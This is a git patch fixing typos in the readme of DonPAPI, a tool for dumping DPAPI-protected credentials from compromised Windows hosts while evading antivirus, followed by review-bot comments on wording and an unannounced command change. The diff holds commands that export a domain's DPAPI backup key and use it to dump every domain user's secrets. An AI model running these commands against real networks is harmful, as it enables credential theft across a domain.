From 01ad18dcf126e543e773e5863d8832de39f4312e Mon Sep 17 00:00:00 2001 From: Login Securite <33292306+login-securite@users.noreply.github.com> Date: Thu, 18 Nov 2021 10:59:43 +0100 Subject: [PATCH] Fixing typos --- readme.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/readme.md b/readme.md index d7fc998..b0277ce 100644 --- a/readme.md +++ b/readme.md @@ -6,7 +6,7 @@ Dumping revelant information on compromised targets without AV detection ## DPAPI dumping Lots of credentials are protected by [DPAPI](https://docs.microsoft.com/en-us/dotnet/standard/security/how-to-use-data-protection). -We aim at locating those "secured" credentials, and retreive them using : +We aim at locating those "secured" credentials, and retrieve them using : - User password - Domaine DPAPI BackupKey - Local machine DPAPI Key (protecting `TaskScheduled` blob) @@ -84,10 +84,10 @@ DonPAPI.py -credz credz_file.txt domain/user:passw0rd@target When a domain admin user is available, it is possible to dump the domain backup key using impacket `dpapi.py` tool. ```bash -dpapi.py backupkey --export +dpapi.py backupkeys --export -t domain/user:passw0rd@target_dc_ip ``` -This backup key can then be used to dump all domain user's secrets! +This backup key (pvk file) can then be used to dump all domain user's secrets! `python DonPAPI.py -pvk domain_backupkey.pvk domain/user:passw0rd@domain_network_list`
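Review bot: In the first hunk (readme.md, "DPAPI dumping" section), two typos remain next to the corrected "retrieve", although the subject is "Fixing typos". The unchanged lines still read "Dumping revelant information" and "- Domaine DPAPI BackupKey"; these should be "relevant" and "Domain". The corrected sentence is also still ungrammatical: "We aim at locating ... and retrieve them using :" would read better as "We aim at locating those "secured" credentials and retrieving them using:", without the space before the colon.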
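Review bot: In the second hunk, the change inside the bash block from `dpapi.py backupkey --export` to `dpapi.py backupkeys --export -t domain/user:passw0rd@target_dc_ip` corrects a command, not a typo. The subject "Fixing typos" hides this from anyone scanning the log for the point where the documented command changed, so mention it in the commit message or split it into its own commit. In the same hunk, "all domain user's secrets" should be "all domain users' secrets". The follow-up command `python DonPAPI.py -pvk domain_backupkey.pvk ...` is left as inline code and prefixed with `python`, while the example just above the hunk calls `DonPAPI.py -credz ...` directly and the dpapi.py command is fenced. Put it in a bash fence and use one invocation style throughout. The new "(pvk file)" remark would also help more if it stated that the exported file is the one passed to `-pvk`, since the readme never connects the export step to the name `domain_backupkey.pvk`.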